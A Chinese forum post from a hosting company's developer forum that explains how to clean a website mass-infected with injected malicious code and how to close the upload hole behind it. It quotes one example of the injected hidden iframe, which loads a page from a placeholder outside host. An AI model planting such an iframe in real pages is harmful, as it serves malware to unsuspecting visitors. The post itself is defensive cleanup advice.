新技术论坛
搜索
查看: 707|回复: 0
打印 上一主题 下一主题

用户的空间被黑,服务器是否不安全?

[复制链接]

该用户从未签到

扫一扫,手机访问本帖
楼主
跳转到指定楼层
发表于 2016-2-26 10:27:02 来自手机 | 只看该作者 |只看大图 回帖奖励 |倒序浏览 |阅读模式

当浏览你的站点突然杀毒软件报毒,打开页面源文件被嵌入了一段代码,并且所有的文件都被批量嵌入一段代码。也就是说你的站点被批量挂马了。此时不必惊慌:

这一般是因为您的网站中的某个程序有上传漏洞,被黑客上传木马后,修改了您的网站,在您的网页中添加了病毒代码所致。 (可以带网上去了解一些批量挂马的文章就知道了。批量挂马现在上传漏洞中已经不为罕见)


解决办法:例如您是在访问/index.asp 这个网页时提示有病毒的,首先通过ftp登录,将这个文件下载到您本地。因为黑客只是杀入了一段代码,所以即使您用杀毒软件来扫描这个文件,杀毒软件也会认为没有病毒。这种情况需要手工删除病毒代码。 有时候所有的.htm .js文件也会被批量修改。


  用记事本等工具打开下载回来的index.asp 文件。一般黑客会在这个文件尾部插入一段
《iframe id="baiduframe" border="0" vspace="0" hspace="0" marginwidth="0" marginheight="0"
framespacing="0" frameborder="0" scrolling="no" width="140" height="75"
src="http://www.xxxx.com/mm.htm";>   
  如果尾部没有,则可以先搜索iframe,然后再处理。


  如果搜索完了也没有,则代码可能隐藏在index.asp中调用的其他文件中,比如index.asp 在首部包含了conn.asp head.asp 。有时病毒代码也会隐藏在这些文件里面,按上面的办法下载这些文件并删除相关的代码即可。


  清除病毒后,还需找到您的网站漏洞所在,否则黑洞今后可能再次上传病毒代码; 如果您的网站使用了动网论坛、动易建站等程序,请将他们升级到最新版,或者到这些程序的官方网站上寻求解决方案。如果您是自己开发的程序,需要特别注意有文件上传功能的地方,动网、动网等程序曾经就发生过因为上传功能有漏洞,导致轻易被黑客入侵的情况。



使用讯网的主机有效杜绝上传木马危害的方法:在你的主机空间管理中找到“高级功能”下的“执行权限设置” 把不需要执行权限的目录使用此功能关闭执行权限,即使黑客上传了木马到你的上传目录中,这个木马也不会执行任何动作。
批量清马方法很多:可以把程序打包下载本地,使用批量修改工具把那段有害代码替换掉,也可以借助网上一些清理工具。

高级模式
B Color Image Link Quote Code Smilies

本版积分规则

手机版|Archiver|开发者俱乐部 ( ICP/ISP证:辽B-2-4-20110106号 IDC证:辽B-1-2-20070003号 )

GMT+8, 2024-12-23 10:14 , Processed in 0.121524 second(s), 20 queries .

X+ Open Developer Network (xodn.com)

© 2009-2017 沈阳讯网网络科技有限公司

快速回复 返回顶部 返回列表